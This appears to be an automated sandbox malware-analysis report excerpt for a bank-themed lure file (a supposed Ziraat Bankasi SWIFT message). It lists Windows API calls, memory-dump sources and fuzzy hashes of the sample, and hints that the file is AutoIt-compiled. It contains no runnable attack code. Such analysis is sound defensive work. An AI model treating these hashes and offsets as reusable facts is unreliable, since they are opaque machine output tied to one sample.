                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0011DC00), ref: 000DB749
                                                                                                                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 000DB8C1
                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 000DB8EB
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 560350794-0
                                                                                                                                                        • Opcode ID: 9f263ebeb952f263da7a8b3cc101c50990625cb2a78cd848384139b51ae8f71f
                                                                                                                                                        • Instruction ID: b132f78d06e59b199a63e3bf86218fd317d1b02ba9c1b125453fe08381d132d2
                                                                                                                                                        • Opcode Fuzzy Hash: 9f263ebeb952f263da7a8b3cc101c50990625cb2a78cd848384139b51ae8f71f
                                                                                                                                                        • Instruction Fuzzy Hash: E6E16B75A00209EFCF14DF94C888EAEB7B9FF89311F118459F905AB250DB71AE41CBA0
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0008936C: __swprintf.LIBCMT ref: 000893AB
                                                                                                                                                          • Part of subcall function 0008936C: __itow.LIBCMT ref: 000893DF
                                                                                                                                                          • Part of subcall function 0009C6F4: _wcscpy.LIBCMT ref: 0009C717
                                                                                                                                                        • _wcstok.LIBCMT ref: 000D184E
                                                                                                                                                        • _wcscpy.LIBCMT ref: 000D18DD
                                                                                                                                                        • _memset.LIBCMT ref: 000D1910
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                                                        • String ID: X
                                                                                                                                                        • API String ID: 774024439-3081909835
                                                                                                                                                        • Opcode ID: dce497cf19ceda9c58ffb17e7246af9d71a96966ad1508c14ac42e46ae890dc6
                                                                                                                                                        • Instruction ID: 17b3bd4220588dd7790f8fce5878be8fae9549a886193f5d6d90f53910abbf79
                                                                                                                                                        • Opcode Fuzzy Hash: dce497cf19ceda9c58ffb17e7246af9d71a96966ad1508c14ac42e46ae890dc6
                                                                                                                                                        • Instruction Fuzzy Hash: AFC17D31508340AFC764EF64C895ADAB7E4BF95350F04492EF89A973A2DB30ED05CB92
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0009B34E: GetWindowLongW.USER32(?,000000EB), ref: 0009B35F
                                                                                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 000F016D
                                                                                                                                                        • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 000F038D
                                                                                                                                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 000F03AB
                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?), ref: 000F03D6
                                                                                                                                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 000F03FF
                                                                                                                                                        • ShowWindow.USER32(00000003,00000000), ref: 000F0421
                                                                                                                                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 000F0440
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3356174886-0
                                                                                                                                                        • Opcode ID: 63a2589c90bc97d29b354cde6b28641df6d07cb1ccf9d2f26abc8d4a1850f33a
                                                                                                                                                        • Instruction ID: 7454fc281396f2abbe0f6b603fdaa501b62ca40809db57c423b28870b6041036
                                                                                                                                                        • Opcode Fuzzy Hash: 63a2589c90bc97d29b354cde6b28641df6d07cb1ccf9d2f26abc8d4a1850f33a
                                                                                                                                                        • Instruction Fuzzy Hash: 31A1103560061AEFDB18CF68C9857BDBBF5BF48700F048115EE54A7692D770AE90EB90
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 1827f71a050a52bc20fd0b9ecf0440b7307a1477b108c3e8388b496c90b30c1c
                                                                                                                                                        • Instruction ID: 59ae8f9f0179c5818ef3602da588a226d822e1788b07422a05611681af6150ed
                                                                                                                                                        • Opcode Fuzzy Hash: 1827f71a050a52bc20fd0b9ecf0440b7307a1477b108c3e8388b496c90b30c1c
                                                                                                                                                        • Instruction Fuzzy Hash: 69715DB1A00109EFCF14CF98CC89ABEBBB5FF86314F248159F915A6251C734AA51DFA1
                                                                                                                                                        APIs
                                                                                                                                                        • GetParent.USER32(?), ref: 000C3DE7
                                                                                                                                                        • GetKeyboardState.USER32(?), ref: 000C3DFC
                                                                                                                                                        • SetKeyboardState.USER32(?), ref: 000C3E5D
                                                                                                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 000C3E8B
                                                                                                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 000C3EAA
                                                                                                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 000C3EF0
                                                                                                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 000C3F13
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 87235514-0
                                                                                                                                                        • Opcode ID: cb5f11b7c1b23486b29757cd1d9edfa8bf77a243bd53ae9c0230153fbac23f79
                                                                                                                                                        • Instruction ID: c75a8d8c483442d6d60d996bf616cfd0d8c343d7a66019dab58b52f1cf1e8fec
                                                                                                                                                        • Opcode Fuzzy Hash: cb5f11b7c1b23486b29757cd1d9edfa8bf77a243bd53ae9c0230153fbac23f79
                                                                                                                                                        • Instruction Fuzzy Hash: A351DFA0A247D53DFB3643248C45FBE7EE96B06304F08888CF1D5568C3D2A8AEC5D760
                                                                                                                                                        APIs
                                                                                                                                                        • GetParent.USER32(00000000), ref: 000C3C02
                                                                                                                                                        • GetKeyboardState.USER32(?), ref: 000C3C17
                                                                                                                                                        • SetKeyboardState.USER32(?), ref: 000C3C78
                                                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 000C3CA4
                                                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 000C3CC1
                                                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 000C3D05
                                                                                                                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 000C3D26
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 87235514-0
                                                                                                                                                        • Opcode ID: 345487013478c3666cb671fad4809cfbd2ce3c2d298b978900fc102968ef2714
                                                                                                                                                        • Instruction ID: a411c1b4610f0041605282ecd18ca35ba890a374e98a49cebd1585cc0f1ca62f
                                                                                                                                                        • Opcode Fuzzy Hash: 345487013478c3666cb671fad4809cfbd2ce3c2d298b978900fc102968ef2714
                                                                                                                                                        • Instruction Fuzzy Hash: 9B51D1A05247D53DFB3683648C56FBEBEE96B06300F08C48CE5D65A8C2D695EE84E760
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcsncpy$LocalTime
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2945705084-0
                                                                                                                                                        • Opcode ID: cf9b8254aec6e561f4627d6bd2396d22c6888a7e6c8b0f0019d1133363a4ceca
                                                                                                                                                        • Instruction ID: 5e9ef79fa99f2842b1e722575589e21db075545bd52a0693b2251c51490c781c
                                                                                                                                                        • Opcode Fuzzy Hash: cf9b8254aec6e561f4627d6bd2396d22c6888a7e6c8b0f0019d1133363a4ceca
                                                                                                                                                        • Instruction Fuzzy Hash: B1417366C1021876DF10EBF4C88AACF77AC9F06310F50897AE518E3163F634D61587A5
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 000C6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,000C5FA6,?), ref: 000C6ED8
                                                                                                                                                          • Part of subcall function 000C6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,000C5FA6,?), ref: 000C6EF1
                                                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 000C5FC9
                                                                                                                                                        • _wcscmp.LIBCMT ref: 000C5FE7
                                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 000C6000
                                                                                                                                                          • Part of subcall function 000C6318: GetFileAttributesW.KERNEL32(?,?,?,?,000C60C3), ref: 000C6369
                                                                                                                                                          • Part of subcall function 000C6318: GetLastError.KERNEL32(?,?,?,000C60C3), ref: 000C6374
                                                                                                                                                          • Part of subcall function 000C6318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,000C60C3), ref: 000C6388
                                                                                                                                                        • _wcscat.LIBCMT ref: 000C6042
                                                                                                                                                        • SHFileOperationW.SHELL32 ref: 000C60AA
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$FullNamePath$AttributesCreateDirectoryErrorLastMoveOperation_wcscat_wcscmplstrcmpi
                                                                                                                                                        • String ID: \*.*
                                                                                                                                                        • API String ID: 1724171360-1173974218
                                                                                                                                                        • Opcode ID: cf9f78363d315be9894e7ab7d87fc50655735401b6491d26f885a68b9005ab6b
                                                                                                                                                        • Instruction ID: 1a2186ed9fe1343335db1444afd402677abb107ed9048b577fecda98d5c780cd
                                                                                                                                                        • Opcode Fuzzy Hash: cf9f78363d315be9894e7ab7d87fc50655735401b6491d26f885a68b9005ab6b
                                                                                                                                                        • Instruction Fuzzy Hash: D3311B72D043199ADF61EBA4D849FEE77B9AF4C300F1400AAA809E3153EA75D785CB51
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 000E8FE7
                                                                                                                                                        • GetWindowLongW.USER32(00CFD920,000000F0), ref: 000E901A
                                                                                                                                                        • GetWindowLongW.USER32(00CFD920,000000F0), ref: 000E904F
                                                                                                                                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 000E9081
                                                                                                                                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 000E90AB
                                                                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 000E90BC
                                                                                                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 000E90D6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LongWindow$MessageSend
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2178440468-0
                                                                                                                                                        • Opcode ID: d0533ed4ee606db83bab88b5fc004bdbb8e1bb3daf3948dc305ae7e3f3409b76
                                                                                                                                                        • Instruction ID: 1309ef187b1d5f770bcf39f81e8650886196d5ab4cbd6d1b62244602b2886258
                                                                                                                                                        • Opcode Fuzzy Hash: d0533ed4ee606db83bab88b5fc004bdbb8e1bb3daf3948dc305ae7e3f3409b76
                                                                                                                                                        • Instruction Fuzzy Hash: 0F315774600254EFDB60CF99DC88FA437E6FB4A314F154164F6199B6B2CBB2A880CB40
                                                                                                                                                        APIs
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000C08F2
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000C0918
                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 000C091B
                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 000C0939
                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 000C0942
                                                                                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 000C0967
                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 000C0975
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3761583154-0
                                                                                                                                                        • Opcode ID: 632b4261bb590b25085cbabc099edc16b773a6b39da1f5351d3bfddbe768b5ef
                                                                                                                                                        • Instruction ID: 39dc16a81db5685da8a4cdbd3b4d57007e95eeec6435c447d83b15d0d0dac2eb
                                                                                                                                                        • Opcode Fuzzy Hash: 632b4261bb590b25085cbabc099edc16b773a6b39da1f5351d3bfddbe768b5ef
                                                                                                                                                        • Instruction Fuzzy Hash: 0E216576601219AFEF109FA8DC88EBF77ECEB09360B408125F955DB161D670EC45CB60
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __wcsnicmp
                                                                                                                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                                        • API String ID: 1038674560-2734436370
                                                                                                                                                        • Opcode ID: ea1cec463249c4f7331f1cbbd42873effe1b87685fa4162fbf41e2ce515babaf
                                                                                                                                                        • Instruction ID: 98056c1591a79784e16e956cc72a415a3e848e021c37ca7dc4430673baf39ddf
                                                                                                                                                        • Opcode Fuzzy Hash: ea1cec463249c4f7331f1cbbd42873effe1b87685fa4162fbf41e2ce515babaf
                                                                                                                                                        • Instruction Fuzzy Hash: CA213732204A1167D734BB74AC12FFF73D8EF65310F10802DF44697482EB659982D3A5
                                                                                                                                                        APIs
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000C09CB
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000C09F1
                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 000C09F4
                                                                                                                                                        • SysAllocString.OLEAUT32 ref: 000C0A15
                                                                                                                                                        • SysFreeString.OLEAUT32 ref: 000C0A1E
                                                                                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 000C0A38
                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 000C0A46
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3761583154-0
                                                                                                                                                        • Opcode ID: ef5fe022df4de38c583144f4983b91af964b65d7f59a19b3aab28afb9a728cc1
                                                                                                                                                        • Instruction ID: 5f622068f45b32e82021b683f2bbe4e91220c18b49b8cf422a9111ee0d2090f4
                                                                                                                                                        • Opcode Fuzzy Hash: ef5fe022df4de38c583144f4983b91af964b65d7f59a19b3aab28afb9a728cc1
                                                                                                                                                        • Instruction Fuzzy Hash: 8A213275600204AFDB109BE8DC89EBE77ECEF083607408129F949CB661DAB0EC81D765
                                                                                                                                                        APIs
                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 0009CCF6
                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 0009CD37
                                                                                                                                                        • ScreenToClient.USER32(?,000000FF), ref: 0009CD5F
                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 0009CE8C
                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 0009CEA5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Rect$Client$Window$Screen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1296646539-0
                                                                                                                                                        • Opcode ID: 5e84639d228de236c70671fcbe7ac0bc1ccb7af3a98adde89045e9025f96cf49
                                                                                                                                                        • Instruction ID: deea928d8932641a63e09e30b8874e9d8c115fd0a83c9f7996e11fd4235b1c46
                                                                                                                                                        • Opcode Fuzzy Hash: 5e84639d228de236c70671fcbe7ac0bc1ccb7af3a98adde89045e9025f96cf49
                                                                                                                                                        • Instruction Fuzzy Hash: F7B15B79900249DBEF60CFA8C480BEDB7F1FF08300F148529ED5AAB650DB70A950EB64
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 000C4B10
                                                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000C4B5B
                                                                                                                                                        • IsMenu.USER32(00000000), ref: 000C4B7B
                                                                                                                                                        • CreatePopupMenu.USER32 ref: 000C4BAF
                                                                                                                                                        • GetMenuItemCount.USER32(000000FF), ref: 000C4C0D
                                                                                                                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 000C4C3E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
